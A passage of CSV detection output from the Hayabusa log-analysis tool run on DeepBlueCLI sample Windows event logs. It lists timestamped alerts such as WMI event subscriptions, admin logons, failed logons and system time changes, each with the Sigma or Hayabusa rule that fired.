+09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:43:44.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:44:02.385 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:59:43.385 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:17:38.760 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:21:25.557 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:27:57.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:38:14.682 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event 